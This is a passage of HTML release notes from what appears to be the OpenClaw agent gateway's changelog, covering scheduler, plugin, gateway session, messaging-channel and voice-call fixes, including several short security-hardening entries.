<li>Heartbeat scheduler: gate exec-event/notification/spawn/retry wakes through a centralized cooldown so backgrounded <code>process.start</code> exit notifications can no longer self-feed runaway heartbeat runs (configured <code>every: "30m"</code> was firing every ~10s in production, pegging the gateway event loop with <code>eventLoopDelayMaxMs &gt;6s</code> spikes that stalled control-UI asset serving and TUI handshakes). Documented wake-now paths (<code>manual</code>, <code>wake</code>, task completion, blocked-task follow-up, <code>/hooks/wake mode=now</code>, and cron <code>--wake now</code>) remain immediate; retryable busy skips no longer poison the cooldown for the next retry; per-agent flood guard caps any unexpected feedback loop at 5 runs/60s. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4236016269" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64016" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64016/hovercard" href="https://github.com/openclaw/openclaw/issues/64016">#64016</a>, refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3946045245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/17797" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/17797/hovercard" href="https://github.com/openclaw/openclaw/issues/17797">#17797</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362911805" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75436" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75436/hovercard" href="https://github.com/openclaw/openclaw/issues/75436">#75436</a>) Thanks @hexsprite.</li>
<li>fix: block workspace CLOUDSDK_PYTHON override and always set trusted interpreter for gcloud. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352375218" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74492" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74492/hovercard" href="https://github.com/openclaw/openclaw/pull/74492">#74492</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Providers/Z.AI: move the bundled GLM catalog and auth env metadata into the plugin manifest, so <code>models list --all --provider zai</code> shows the full known catalog without duplicated runtime seed data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Providers/Qianfan and Providers/Stepfun: declare setup auth metadata (<code>api-key</code> method, <code>QIANFAN_API_KEY</code>, <code>STEPFUN_API_KEY</code>) in the plugin manifest so onboarding and <code>models setup</code> surface the expected env var without falling back to legacy <code>providerAuthEnvVars</code> runtime seed data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>fix(infra): block ambient Homebrew env vars from brew resolution. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351948564" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74463" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74463/hovercard" href="https://github.com/openclaw/openclaw/pull/74463">#74463</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Onboarding/configure: avoid staging every default plugin runtime dependency after config writes, so skipped setup flows only prepare config-selected plugin deps instead of pulling broad feature-plugin packages. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Thinking/providers: resolve bundled provider thinking profiles through lightweight provider policy artifacts when startup-lazy providers are not active, so OpenAI Codex GPT-5.x keeps xhigh available in Gateway session validation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355122984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74796" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74796/hovercard" href="https://github.com/openclaw/openclaw/issues/74796">#74796</a>. Thanks @maxschachere.</li>
<li>Security/Windows: ignore workspace <code>.env</code> system-path variables and resolve stale-process <code>taskkill.exe</code> from the validated Windows install root, preventing repository-local env files from redirecting cleanup helpers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>CLI/plugins: refresh persisted plugin registry policy in place for <code>plugins enable</code> and <code>plugins disable</code>, so routine toggles no longer rebuild and hash every plugin source when the target is already indexed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Windows/install: run npm from a writable installer temp directory and pin the Bedrock runtime dependency below a Windows ARM Node 24 npm resolver failure, so global OpenClaw installs no longer fail before onboarding. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</li>
<li>CLI/plugins: scope install and enable slot selection to the selected plugin manifest/runtime fallback, so plugin installs no longer load every plugin runtime or broad status snapshot just to update memory/context slots. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/TTS: keep bundled speech-provider discovery available on cold package Gateway paths and add bundled plugin matrix runtime probes for health, readiness, RPC, TTS discovery, and post-ready runtime-deps watchdog coverage. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Google Meet/Twilio: show delegated voice call ID, DTMF, and intro-greeting state in <code>googlemeet doctor</code>, and avoid claiming DTMF was sent when no Meet PIN sequence was configured. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Plugins/tools: prefer built bundled plugin code during tool discovery and skip channel runtime hydration while preserving companion provider registrations, reducing per-run plugin-tool prep cost without dropping executable plugin tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361658522" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75290" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75290/hovercard" href="https://github.com/openclaw/openclaw/issues/75290">#75290</a>. Thanks @thanos-openclaw.</li>
<li>Plugins/loader: scope plugin-tool registry reuse to the enabled plugin plan and stored Gateway method keys, so embedded runner tool lookup can reuse compatible startup registries without hiding enabled non-startup plugin tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363466995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75520" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75520/hovercard" href="https://github.com/openclaw/openclaw/issues/75520">#75520</a>. Thanks @whtoo.</li>
<li>Voice Call/Twilio: send notify-mode initial TwiML directly in the outbound create-call request while keeping conversation and pre-connect DTMF calls webhook-driven, so one-shot notify calls do not depend on a first-answer webhook fetch. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335052780" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72758" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72758/hovercard" href="https://github.com/openclaw/openclaw/pull/72758">#72758</a>. Thanks @tyshepps.</li>
<li>Discord/Slack: defer status-reaction cleanup until run finalization so queued, thinking, tool, and terminal reactions no longer flicker during normal progress updates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363934911" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75582" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75582/hovercard" href="https://github.com/openclaw/openclaw/pull/75582">#75582</a>)</li>
<li>Discord/voice: leave voice off for text-only configs unless explicitly configured, rerun configured voice auto-join after gateway RESUMED events, ignore already-destroyed stale voice connections during reconnect cleanup, lengthen the default voice join Ready wait with configurable timeouts, merge configured media-understanding providers such as Deepgram into partial active registries, apply per-channel <code>systemPrompt</code> overrides to voice transcript turns, and run voice-channel turns under a voice-output policy that hides the agent <code>tts</code> tool. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345485387" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73753" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73753/hovercard" href="https://github.com/openclaw/openclaw/issues/73753">#73753</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4043554548" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40665" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40665/hovercard" href="https://github.com/openclaw/openclaw/issues/40665">#40665</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223830724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63098" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63098/hovercard" href="https://github.com/openclaw/openclaw/issues/63098">#63098</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251059736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65687" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65687/hovercard" href="https://github.com/openclaw/openclaw/issues/65687">#65687</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077930512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47095" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47095/hovercard" href="https://github.com/openclaw/openclaw/issues/47095">#47095</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208687812" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61536" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61536/hovercard" href="https://github.com/openclaw/openclaw/issues/61536">#61536</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347706250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74044" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74044/hovercard" href="https://github.com/openclaw/openclaw/issues/74044">#74044</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041199935" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39825" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39825/hovercard" href="https://github.com/openclaw/openclaw/issues/39825">#39825</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245973986" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65039" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65039/hovercard" href="https://github.com/openclaw/openclaw/issues/65039">#65039</a>. Thanks @sanchezm86, @SecureCloudProjO, @liz709, @darealgege, @kzicherman, @ayochim, @OneMintJulep, @qearlyao, and @aounakram.</li>
<li>Plugins/CLI: reuse the cold manifest registry while building plugin status and inspect reports, so large configured plugin sets no longer rediscover the bundled/plugin registry once per inspect row. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/health: refresh cached health RPC snapshots when channel runtime state diverges, so Discord and other channel status reads no longer report stale running or connected values until the cache TTL expires. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362790644" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75423" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75423/hovercard" href="https://github.com/openclaw/openclaw/pull/75423">#75423</a>)</li>
<li>Gateway/sessions: keep session-store reads from running stale prune and entry-count cap maintenance during startup, so oversized stores no longer block chat history readiness after updates while writes and <code>sessions cleanup --enforce</code> still preserve the cleanup safeguards. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307434486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70050" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70050/hovercard" href="https://github.com/openclaw/openclaw/issues/70050">#70050</a>. Thanks @tangda18.</li>
<li>Security/audit: keep plain <code>security audit</code> on the cold config/filesystem path and reserve plugin runtime security collectors for <code>--deep</code>, so large plugin installs cannot execute every plugin runtime during routine audits. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>WhatsApp: stage <code>qrcode</code> through root mirrored runtime dependencies so packaged QR pairing can render from staged plugin-runtime-deps installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362623764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75394" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75394/hovercard" href="https://github.com/openclaw/openclaw/issues/75394">#75394</a>. Thanks @FelipeX2001.</li>
<li>Interactive channel payloads: send Discord component-only interaction replies, Slack block-only slash replies, Telegram button/select fallback labels, and LINE quick-reply fallback option text instead of accepting empty renderable payloads. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Auto-reply/docking: require <code>/dock-*</code> route switches to start from direct chats, so group or channel participants cannot reroute a shared session's future replies into a linked DM. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Discord: keep text-DM main-session route updates pinned to the configured DM owner, matching component interactions so another direct-message sender cannot redirect future main-session replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Mattermost/Matrix: keep direct-message main-session route updates pinned to the configured DM owner so paired or temporarily allowed senders cannot redirect future shared-session replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Discord: keep SecretRef-backed bot tokens discoverable for message actions without resolving the token during schema generation, and resolve scoped channel SecretRefs before outbound agent message sends even when the tool is built from a config snapshot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362174273" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75324" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75324/hovercard" href="https://github.com/openclaw/openclaw/issues/75324">#75324</a>. Thanks @slideshow-dingo and @Conan-Scott.</li>
<li>Updates: run package post-install doctor repair with the managed Gateway service profile and state paths when a daemon is installed, so shell/profile mismatches no longer repair the caller state while the restarted Gateway keeps stale config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Models/DeepInfra: declare DeepInfra manifest catalog discovery and derive its runtime fallback catalog from the manifest, restoring provider-filtered <code>models list --all --provider deepinfra</code> rows without duplicated static model data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/update: verify managed gateway restarts against the installed service port instead of the caller shell port, so package updates do not report a healthy daemon as failed when profiles use different gateway ports. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/agent: reject strict <code>openclaw agent --deliver</code> requests with missing delivery targets before starting the agent run, so users do not wait for a completed turn that cannot send anywhere. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Setup/import: honor non-interactive <code>--import-from</code> onboarding flags by running the migration import path instead of silently completing normal setup without importing anything. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Doctor/plugins: keep plain <code>doctor --non-interactive</code> from installing bundled plugin runtime dependencies, so headless health checks report missing deps while <code>doctor --fix</code> remains the explicit repair path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Doctor/gateway: require an interactive confirmation before installing or rewriting the Gateway service, so <code>doctor --fix --non-interactive</code> can repair plugin/config drift without replacing the operator's launchd/systemd service from a temporary environment. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/runtime-deps: include packaged OpenClaw identity in bundled plugin loader cache keys, so same-path package upgrades stop reusing stale versioned runtime-deps mirrors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357604708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75045" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75045/hovercard" href="https://github.com/openclaw/openclaw/issues/75045">#75045</a>. Thanks @sahilsatralkar.</li>
<li>Plugin SDK: restore reply-prefix and reply-pipeline helpers on the deprecated root/compat SDK surface so external plugins still using <code>openclaw/plugin-sdk</code> do not fail message dispatch after update. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359892122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75171" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75171/hovercard" href="https://github.com/openclaw/openclaw/issues/75171">#75171</a>. Thanks @zhangxiliang.</li>
<li>Plugins/runtime-deps: prune inactive same-package versioned runtime-deps roots after bundled dependency repair, so upgrades do not leave old <code>openclaw-&lt;version&gt;-&lt;hash&gt;</code> package caches behind after doctor runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/runtime-deps: prune legacy version-scoped plugin runtime-deps roots during bundled dependency repair and cover the path in Package Acceptance's upgrade-survivor matrix, so upgrades from 2026.4.x no longer leave stale per-plugin runtime trees after doctor runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/runtime-deps: keep Gateway startup plugin imports and runtime plugin fallback loads verify-only after startup/config repair planning, so packaged installs no longer spawn package-manager repair from hot paths after readiness. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @brokemac79 and @xiaohuaxi.</li>
<li>Plugins/runtime-deps: treat package.json runtime-deps manifests as supersets when generated materialization metadata is absent, so bundled plugin activation stops restaging already-installed dependency subsets on every activation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362879118" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75429" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75429/hovercard" href="https://github.com/openclaw/openclaw/issues/75429">#75429</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362889795" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75431" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75431/hovercard" href="https://github.com/openclaw/openclaw/pull/75431">#75431</a>) Thanks @loyur.</li>
<li>iMessage: add stdin write callback and error listener to IMessageRpcClient so async EPIPE from a closed child process rejects the pending request instead of crashing the gateway with uncaughtException. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</li>
<li>MCP/stdio: settle MCP stdio transport send() from the write callback instead of resolving immediately on buffer acceptance, so async write errors reject the promise instead of being lost. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</li>
<li>Process/exec: add stdin error listener in runCommandWithTimeout so EPIPE from a prematurely-exited child is swallowed instead of escaping to uncaughtException. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</li>
<li>Voice Call/realtime: add default-off fast memory/session context for <code>openclaw_agent_consult</code>, giving live calls a bounded answer-or-miss path before the full agent consult. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329662019" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71849" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71849/hovercard" href="https://github.com/openclaw/openclaw/issues/71849">#71849</a>. Thanks @amzzzzzzz.</li>
<li>Google Meet: interrupt Realtime provider output when local barge-in clears playback, so command-pair audio stops model speech instead of only restarting Chrome playback. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346767837" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73850/hovercard" href="https://github.com/openclaw/openclaw/issues/73850">#73850</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346567653" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73834" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73834/hovercard" href="https://github.com/openclaw/openclaw/pull/73834">#73834</a>) Thanks @shhtheonlyperson.</li>
<li>Gateway/config: cap oversized plugin-owned schemas in the full <code>config.schema</code> response so large installed plugin sets cannot balloon Gateway RSS or crash schema clients. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/update: skip ClawHub and marketplace plugin updates when the bundled version is newer than the recorded installed version, so <code>openclaw update</code> no longer overwrites working bundled plugins with older external packages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363046993" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75447" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75447/hovercard" href="https://github.com/openclaw/openclaw/issues/75447">#75447</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Gateway/sessions: use bounded tail reads for sessions-list transcript usage fallbacks and cap bulk title/last-message hydration, keeping large session stores responsive when rows request derived previews. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/sessions: yield during bulk transcript title/preview hydration and copy compaction checkpoints asynchronously, keeping the Gateway event loop responsive for large session stores and large transcripts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362222686" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75330" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75330/hovercard" href="https://github.com/openclaw/openclaw/issues/75330">#75330</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362708402" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75414" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75414/hovercard" href="https://github.com/openclaw/openclaw/issues/75414">#75414</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Gateway/sessions: stream bounded transcript reads for session detail, history, artifacts, compaction, and send/subscribe sequence paths so small Gateway requests no longer materialize large transcripts or OOM on oversized session logs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/chat: bound chat-history transcript reads to the requested display window so large session logs no longer OOM the Gateway when clients ask for a small history page. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>BlueBubbles: detect audio attachments by Apple UTIs (<code>public.audio</code>, <code>public.mpeg-4-audio</code>, <code>com.apple.m4a-audio</code>, <code>com.apple.coreaudio-format</code>) in addition to <code>audio/*</code> MIME, so iMessage voice notes whose webhook payload only carries the UTI are now classified as audio in the inbound <code>&lt;media:audio&gt;</code> placeholder instead of falling through to the generic <code>&lt;media:attachment&gt;</code> tag. Thanks @omarshahine.</li>
<li>Voice Call/Twilio: honor stored pre-connect TwiML before realtime webhook shortcuts and reject DTMF sequences outside conversation mode, so Meet PIN entry cannot be skipped or silently dropped. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</li>
